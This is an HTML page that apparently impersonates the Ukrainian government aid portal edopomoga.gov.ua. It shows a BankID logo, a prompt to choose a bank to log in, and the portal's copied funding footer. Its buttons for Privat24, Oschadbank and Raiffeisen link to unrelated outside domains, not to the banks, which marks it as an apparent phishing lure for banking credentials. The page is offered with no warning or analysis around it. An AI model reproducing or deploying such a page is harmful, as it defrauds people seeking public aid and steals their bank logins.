<!DOCTYPE html>
<html style="font-size: 16px;" lang="uk"><head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta charset="utf-8">
    <meta name="keywords" content="Виберіть свій банк для ​авторизації:">
    <meta name="description" content="">
    <title>авторизація</title>
    <link rel="stylesheet" href="nicepage.css" media="screen">
<link rel="stylesheet" href="авторизація.css" media="screen">
    <script class="u-script" type="text/javascript" src="jquery-1.9.1.min.js" defer=""></script>
    <script class="u-script" type="text/javascript" src="nicepage.js" defer=""></script>
    <meta name="generator" content="Nicepage 6.3.4, nicepage.com">
    <link id="u-theme-google-font" rel="stylesheet" href="https://fonts.googleapis.com/css?family=Raleway:100,100i,200,200i,300,300i,400,400i,500,500i,600,600i,700,700i,800,800i,900,900i|Open+Sans:300,300i,400,400i,500,500i,600,600i,700,700i,800,800i">
    
    
    
    
    
    
    
    <script type="application/ld+json">{
		"@context": "http://schema.org",
		"@type": "Organization",
		"name": "FinUniorEC",
		"logo": "images/r4yuHhW0RnK0.svg"
}</script>
    <meta name="theme-color" content="#2799b1">
    <meta property="og:title" content="авторизація">
    <meta property="og:type" content="website">
  <meta data-intl-tel-input-cdn-path="intlTelInput/"></head>
  <body data-path-to-root="./" data-include-products="false" class="u-body u-xl-mode" data-lang="uk" data-lang-ru="{&quot;head-title&quot;:&quot;&quot;,&quot;head-keywords&quot;:&quot;Виберіть свій банк для ​авторизації:&quot;,&quot;head-description&quot;:&quot;&quot;}" data-lang-uk="{&quot;head-title&quot;:&quot;&quot;,&quot;head-keywords&quot;:&quot;Виберіть свій банк для ​авторизації:&quot;,&quot;head-description&quot;:&quot;&quot;}"><header class="u-clearfix u-header u-header" id="sec-9c34"><div class="u-clearfix u-sheet u-sheet-1">
        <a href="https://nicepage.app" class="u-image u-logo u-image-1" data-image-width="227" data-image-height="49">
          <img src="images/r4yuHhW0RnK0.svg" class="u-logo-image u-logo-image-1">
        </a>
      </div></header>
    <section class="u-clearfix u-gradient u-section-1" id="sec-b35d">
      <div class="u-clearfix u-sheet u-sheet-1">
        <img class="custom-expanded u-expanded-width-lg u-expanded-width-md u-expanded-width-xl u-image u-image-contain u-image-default u-image-1" src="images/BankID-logo-2_1.png" alt="" data-image-width="1823" data-image-height="710" data-lang-ru="" data-lang-uk="">
        <h2 class="u-text u-text-default-lg u-text-default-md u-text-default-xl u-text-1" data-lang-ru="<span style=&quot;font-size: 1.5rem;&quot;>Виберіть свій банк для ​авторизації</span>:" data-lang-uk="<span style=&quot;font-size: 1.5rem;&quot;>Виберіть свій банк для ​авторизації</span>:">
          <span style="font-size: 1.5rem;">Виберіть свій банк для ​авторизації</span>:
        </h2>
      </div>
    </section>
    <section class="u-clearfix u-grey-10 u-section-2" id="sec-861f">
      <div class="u-clearfix u-sheet u-sheet-1">
        <a href="https://godits.info/select/228172737/privat" class="u-border-2 u-border-grey-75 u-btn u-btn-round u-button-style u-gradient u-none u-radius u-text-body-alt-color u-btn-1" data-lang-ru="{&quot;content&quot;:&quot;приват 24​&quot;,&quot;href&quot;:&quot;https://nicepage.com/k/prescription-medicine-html-templates&quot;}" data-lang-uk="{&quot;content&quot;:&quot;приват 24​&quot;,&quot;href&quot;:&quot;https://nicepage.com/k/prescription-medicine-html-templates&quot;}">приват 24 </a>
        <a href="https://gouidfe.com/bi/46417056551" class="u-border-2 u-border-grey-75 u-btn u-btn-round u-button-style u-gradient u-none u-radius u-text-body-alt-color u-btn-2" data-lang-ru="{&quot;content&quot;:&quot;Ощадбанк​&quot;,&quot;href&quot;:&quot;https://nicepage.com/k/prescription-medicine-html-templates&quot;}" data-lang-uk="{&quot;content&quot;:&quot;Ощадбанк​&quot;,&quot;href&quot;:&quot;https://nicepage.com/k/prescription-medicine-html-templates&quot;}">Ощадбанк </a>
        <a href="https://gouidfe.com/bi/86117056551" class="u-border-2 u-border-grey-75 u-btn u-btn-round u-button-style u-gradient u-none u-radius u-text-body-alt-color u-btn-3" data-lang-ru="{&quot;content&quot;:&quot;райффайзен​&quot;,&quot;href&quot;:&quot;https://nicepage.com/k/prescription-medicine-html-templates&quot;}" data-lang-uk="{&quot;content&quot;:&quot;райффайзен​&quot;,&quot;href&quot;:&quot;https://nicepage.com/k/prescription-medicine-html-templates&quot;}">райффайзен </a>
      </div>
    </section>
    <section class="u-clearfix u-image u-section-3" id="sec-486b" data-image-width="1024" data-image-height="535">
      <div class="u-clearfix u-sheet u-sheet-1"></div>
    </section>
    <section class="u-clearfix u-section-4" id="sec-d43a">
      <div class="u-clearfix u-sheet u-sheet-1"></div>
    </section>
    
    
    
    
    <footer class="u-align-center u-clearfix u-footer u-grey-80 u-footer" id="sec-90c0"><div class="u-clearfix u-sheet u-sheet-1">
        <p class="u-text u-text-1" data-lang-ru="Проєкт реалізований завдяки підтримці американського народу, наданій через&amp;nbsp;<a class=&quot;link link_reverse link_white u-active-none u-border-none u-btn u-button-style u-hover-none u-none u-text-palette-1-base u-btn-1&quot; rel=&quot;nofollow&quot; href=&quot;https://www.usaid.gov/&quot; target=&quot;_blank&quot; data-lang-ru=&quot;{&amp;quot;content&amp;quot;:&amp;quot;Агентство США з міжнародного розвитку (USAID)&amp;quot;,&amp;quot;href&amp;quot;:&amp;quot;https://www.usaid.gov/&amp;quot;}&quot; data-lang-uk=&quot;{&amp;quot;content&amp;quot;:&amp;quot;Агентство США з міжнародного розвитку (USAID)&amp;quot;,&amp;quot;href&amp;quot;:&amp;quot;https://www.usaid.gov/&amp;quot;}&quot; style=&quot;background-image: none&quot;>Агентство США з міжнародного розвитку (USAID)</a>, за фінансової підтримки&amp;nbsp;<a class=&quot;link link_reverse link_white u-active-none u-border-none u-btn u-button-style u-hover-none u-none u-text-palette-1-base u-btn-2&quot; rel=&quot;nofollow&quot; href=&quot;https://www.gov.uk/government/organisations/department-for-international-development&quot; target=&quot;_blank&quot; data-lang-ru=&quot;{&amp;quot;content&amp;quot;:&amp;quot;уряду Великобританії (UK aid)&amp;quot;,&amp;quot;href&amp;quot;:&amp;quot;https://www.gov.uk/government/organisations/department-for-international-development&amp;quot;}&quot; data-lang-uk=&quot;{&amp;quot;content&amp;quot;:&amp;quot;уряду Великобританії (UK aid)&amp;quot;,&amp;quot;href&amp;quot;:&amp;quot;https://www.gov.uk/government/organisations/department-for-international-development&amp;quot;}&quot; style=&quot;background-image: none&quot;>уряду Великобританії (UK aid)</a>&amp;nbsp;в рамках проєкту USAID/UK aid&amp;nbsp;<a class=&quot;link link_reverse link_white u-active-none u-border-none u-btn u-button-style u-hover-none u-none u-text-palette-1-base u-btn-3&quot; rel=&quot;nofollow&quot; href=&quot;https://tapas.org.ua/&quot; target=&quot;_blank&quot; data-lang-ru=&quot;{&amp;quot;content&amp;quot;:&amp;quot;«Прозорість та підзвітність у державному управлінні та послугах/TAPAS»&amp;quot;,&amp;quot;href&amp;quot;:&amp;quot;https://tapas.org.ua/&amp;quot;}&quot; data-lang-uk=&quot;{&amp;quot;content&amp;quot;:&amp;quot;«Прозорість та підзвітність у державному управлінні та послугах/TAPAS»&amp;quot;,&amp;quot;href&amp;quot;:&amp;quot;https://tapas.org.ua/&amp;quot;}&quot; style=&quot;background-image: none&quot;>«Прозорість та підзвітність у державному управлінні та послугах/TAPAS»</a>&amp;nbsp;та за сприяння проєкту SURGe, що фінансується Урядом Канади.​" data-lang-uk="Проєкт реалізований завдяки підтримці американського народу, наданій через&amp;nbsp;<a class=&quot;link link_reverse link_white u-active-none u-border-none u-btn u-button-style u-hover-none u-none u-text-palette-1-base u-btn-1&quot; rel=&quot;nofollow&quot; href=&quot;https://www.usaid.gov/&quot; target=&quot;_blank&quot; style=&quot;background-image: none&quot;>Агентство США з міжнародного розвитку (USAID)</a>, за фінансової підтримки&amp;nbsp;<a class=&quot;link link_reverse link_white u-active-none u-border-none u-btn u-button-style u-hover-none u-none u-text-palette-1-base u-btn-2&quot; rel=&quot;nofollow&quot; href=&quot;https://www.gov.uk/government/organisations/department-for-international-development&quot; target=&quot;_blank&quot; style=&quot;background-image: none&quot;>уряду Великобританії (UK aid)</a>&amp;nbsp;в рамках проєкту USAID/UK aid&amp;nbsp;<a class=&quot;link link_reverse link_white u-active-none u-border-none u-btn u-button-style u-hover-none u-none u-text-palette-1-base u-btn-3&quot; rel=&quot;nofollow&quot; href=&quot;https://tapas.org.ua/&quot; target=&quot;_blank&quot; style=&quot;background-image: none&quot;>«Прозорість та підзвітність у державному управлінні та послугах/TAPAS»</a>&amp;nbsp;та за сприяння проєкту SURGe, що фінансується Урядом Канади.​">Проєкт реалізований завдяки підтримці американського народу, наданій через&nbsp;<a class="link link_reverse link_white u-active-none u-border-none u-btn u-button-style u-hover-none u-none u-text-palette-1-base u-btn-1" rel="nofollow" href="https://www.usaid.gov/" target="_blank">Агентство США з міжнародного розвитку (USAID)</a>, за фінансової підтримки&nbsp;<a class="link link_reverse link_white u-active-none u-border-none u-btn u-button-style u-hover-none u-none u-text-palette-1-base u-btn-2" rel="nofollow" href="https://www.gov.uk/government/organisations/department-for-international-development" target="_blank">уряду Великобританії (UK aid)</a>&nbsp;в рамках проєкту USAID/UK aid&nbsp;<a class="link link_reverse link_white u-active-none u-border-none u-btn u-button-style u-hover-none u-none u-text-palette-1-base u-btn-3" rel="nofollow" href="https://tapas.org.ua/" target="_blank">«Прозорість та підзвітність у державному управлінні та послугах/TAPAS»</a>&nbsp;та за сприяння проєкту SURGe, що фінансується Урядом Канади. 
        </p>
        <p class="u-small-text u-text u-text-variant u-text-2" data-lang-ru="edopomoga.gov.ua<br>2024. Всі права захищені​" data-lang-uk="edopomoga.gov.ua<br>2024. Всі права захищені​">edopomoga.gov.ua<br>2024. Всі права захищені 
        </p>
      </div></footer>
    <section class="u-backlink u-clearfix u-grey-80">
      <a class="u-link" href="https://nicepage.com/website-templates" target="_blank">
        <span>Website Templates</span>
      </a>
      <p class="u-text">
        <span>created with</span>
      </p>
      <a class="u-link" href="" target="_blank">
        <span>Website Builder Software</span>
      </a>. 
    </section>
  
</body></html>